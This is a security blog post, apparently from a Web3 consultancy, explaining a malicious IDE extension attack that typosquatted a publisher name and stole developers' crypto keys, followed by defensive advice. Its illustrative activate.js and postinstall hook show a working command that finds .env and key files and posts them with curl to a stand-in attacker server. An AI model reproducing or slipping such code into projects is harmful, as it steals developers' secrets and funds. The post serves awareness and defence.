
Imagine this: a single line of code, a harmless-looking tool, a quick update. That's all it took for a veteran Web3 developer to lose over $500,000 in crypto. This wasn't because of a fake website or a bad smart contract. The attack came from an unexpected place: the very place where they wrote their code. It’s a harsh reminder that the safety of your tools and your money are much more connected than you might think.
This frightening incident, now known as the Cursor Security Incident, is a vital lesson for all of us. We're seeing a new kind of threat where the software we trust is being used against us. It’s no longer enough to just secure your app; you have to protect your own computer, too.
In the world of software, a supply chain attack is when a hacker sneaks bad code into a legitimate program you use every day. For Web3 developers, this is a huge problem. Our code editors (IDEs) are full of valuable information: private keys, secret API codes, and wallet data. If a hacker can get into the IDE or one of its extensions, they have a direct path to our most valuable assets.
The open nature of many IDE marketplaces is both a blessing and a curse. It lets anyone create amazing tools, but it also makes it easy for bad actors to join in. They can publish a malicious extension that looks totally fine, then use clever tricks to make it look popular and trustworthy.
The Cursor incident in June 2025 was a perfect example of a multi-stage attack. It didn’t rely on a single mistake but on a combination of clever social tricks and technical know-how.
The attack started with a fake IDE extension. Instead of hacking the platform, the attackers went after the user's trust. The malicious extension, "Solidity Language," was made to look like a real, popular one. To get it to the top of the search results, the attackers used a few tricks:
Typosquatting: The name of the person who published the extension was a subtle lookalike of a real one (juanbIanco, with a capital "I", instead of juanblanco with a lowercase "l").
Fake Updates: They released small, frequent updates to make it look like the extension was well-maintained.
Fake Downloads: They used bots to artificially inflate the download count, making it seem very popular and safe.
A developer looking for a Solidity tool would see this extension at the top of the list and, seeing all the downloads, would likely think it was safe to install.
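The publisher-name trick is easy to demonstrate. In many UI fonts, a capital "I" and a lowercase "l" render almost identically, so two publisher names can look the same on screen while being completely different strings:

```javascript
// The real publisher vs. the impostor. In many sans-serif UI fonts,
// capital 'I' and lowercase 'l' are nearly indistinguishable.
const real = 'juanblanco'; // lowercase 'l'
const fake = 'juanbIanco'; // capital 'I'

console.log(real === fake);               // false: different strings
console.log(real.length === fake.length); // true: same length, one swapped glyph
console.log(real.charCodeAt(5), fake.charCodeAt(5)); // 108 ('l') vs 73 ('I')
```

To the marketplace, these are two unrelated accounts; to a human skimming search results, they are the same name.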
Once installed, the "Solidity Language" extension didn't do what it promised. Its only job was to be a silent backdoor. It had just enough code to download a secret script from a server controlled by the attackers.
This script was designed for one purpose: to do a lot of damage, quickly and quietly.
Checking the System: First, it gathered information about the victim's computer, like the operating system and network settings.
Stealing Your Stuff: The most crucial step was searching for sensitive files. It specifically looked for anything related to Web3:
Private keys and key files.
.env files that hold secret keys.
Local wallet data, often stored in hidden folders.
Sending it Out: Once the script found the secret data, it used a simple command to send it back to the attacker’s server.
This whole process happened in the background without any pop-ups or warnings. The developer, thinking the extension was just a bit buggy, would keep working, completely unaware that their private keys were being sent to a stranger.

Let's look at a simple example of the kind of code that could be used in such an attack. A developer inspecting a seemingly harmless extension might miss a critical line.
// A hypothetical package.json from a malicious extension
// (comments added for illustration; real JSON does not allow them)
{
  "name": "malicious-solidity-language",
  "version": "1.0.0",
  "description": "Adds Solidity language support to your IDE.",
  "scripts": {
    // This is the danger zone. It runs a script silently after installation.
    "postinstall": "node ./scripts/activate.js"
  },
  "main": "extension.js",
  "publisher": "juanbIanco" // Typosquatting: capital "I" instead of lowercase "l"
}
// An excerpt from the activate.js file
const { exec } = require('child_process');

// The main function that gets called
function activate() {
  console.log("Activating...");

  // This is the core of the attack: a simple shell command.
  // It uses `find` to look for sensitive files and then `curl` to send them
  // to a hacker's server. All done silently in the background.
  const command = `find ~/ -name ".env" -o -name "*key*.pem" | xargs -I {} curl -X POST https://malicious-server.com/exfil -d @{} -s`;

  exec(command, (error, stdout, stderr) => {
    if (error) {
      console.error(`exec error: ${error}`);
      return;
    }
    // No output is shown to the user; the data is just gone.
    console.log(`stdout: ${stdout}`);
    console.error(`stderr: ${stderr}`);
  });
}

// Call the activation function
activate();
This is a scarily simple and effective way to steal data. The exec command runs silently and doesn't show any output in the terminal. The developer would have no idea their secrets were being found and sent to a hacker.
The Cursor incident shows us that we need to completely change how we think about security. Here are some common mistakes to avoid:
Mistake: "It's from a verified app store, so it must be safe."
The Reality: These marketplaces have security, but they aren’t perfect. Hackers can get around the checks. Your trust is the target.
Mistake: "It's just a simple tool—a formatter or a theme—it can't be dangerous."
The Reality: Many of these "harmless" tools need broad permissions to work. A simple linter, for example, needs to read your entire codebase, which includes your secret .env files.
Mistake: "My private keys are safe because I keep them in an encrypted vault."
The Reality: That’s a great practice, but the attack isn’t on your vault. It’s on your live coding environment where you might be using a simple, unencrypted copy of a key for testing.
The Cursor incident isn't new; it's just the latest in a long history of these kinds of attacks. Before IDEs, hackers often targeted package registries like npm. A famous example is the 2018 event-stream incident, where a compromised dependency was used to steal crypto from wallet users.
The move from event-stream to Cursor shows a worrying trend: attackers are moving up the software food chain. They no longer just target your project’s dependencies but the very tools you use to build your project. This is a much bigger deal because a single compromised tool can give them access to hundreds of projects and wallets.

Check Every Extension: Don’t just look at the star rating or download count. Find a public GitHub page for the extension, check its history, and read the reviews.
Isolate Your Work: Use a separate computer or a sandboxed environment (like a virtual machine) for development. Don't use your personal computer with your wallet and your dev tools on it.
Check Your Packages: Use automated tools to scan your project for known vulnerabilities in third-party packages.
Trust No One: Assume every tool is a potential risk. Limit permissions, use two-factor authentication everywhere, and regularly check your computer for strange processes or network activity.
Guard Your Keys: Never, ever store your mainnet private keys on your development computer. Use a hardware wallet or a secure, air-gapped system for all real-world transactions.
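The "Check Every Extension" step can be partially automated. A crude but useful heuristic, sketched below, is to compare a publisher name against a list of publishers you already trust using edit distance: an exact match is fine, while a distance of one or two characters (like juanbIanco vs juanblanco) is a classic typosquat signature. The trusted list here is hypothetical; you would maintain your own.

```javascript
// Flag publisher names that are suspiciously close to a known-good list.
// "juanbIanco" vs "juanblanco" differ by a single substituted character,
// so a small edit distance against a trusted name is a red flag.

// Classic dynamic-programming Levenshtein distance.
function editDistance(a, b) {
  const dp = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0))
  );
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1, // deletion
        dp[i][j - 1] + 1, // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1) // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

function checkPublisher(name, trusted) {
  for (const good of trusted) {
    if (name === good) return { verdict: 'trusted', match: good };
    if (editDistance(name.toLowerCase(), good.toLowerCase()) <= 2) {
      return { verdict: 'possible typosquat', match: good };
    }
  }
  return { verdict: 'unknown publisher', match: null };
}

// Hypothetical allowlist of publishers you have personally vetted.
const trusted = ['juanblanco', 'nomicfoundation'];
console.log(checkPublisher('juanblanco', trusted)); // verdict: 'trusted'
console.log(checkPublisher('juanbIanco', trusted)); // verdict: 'possible typosquat'
```

It won't catch everything (a homoglyph from another alphabet can defeat it), but it costs nothing to run before installing a new tool.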
The Web3 security world is getting more complex, and so are the hackers. As developers, our job is more than just writing secure code. We're now on the front lines of a new kind of cybercrime, where our very tools are the battlefield. The Cursor incident isn't just a scary story; it's a call to action.
By being smart and proactive about our development environments, we can turn this scary new threat into a manageable risk. We have to keep learning, sharing what we find, and demanding better security from the tools we use every day. Our wallets—and the future of Web3—depend on it.
Let’s build something incredible together.
Email us at hello@ancilar.com
Explore more: www.ancilar.com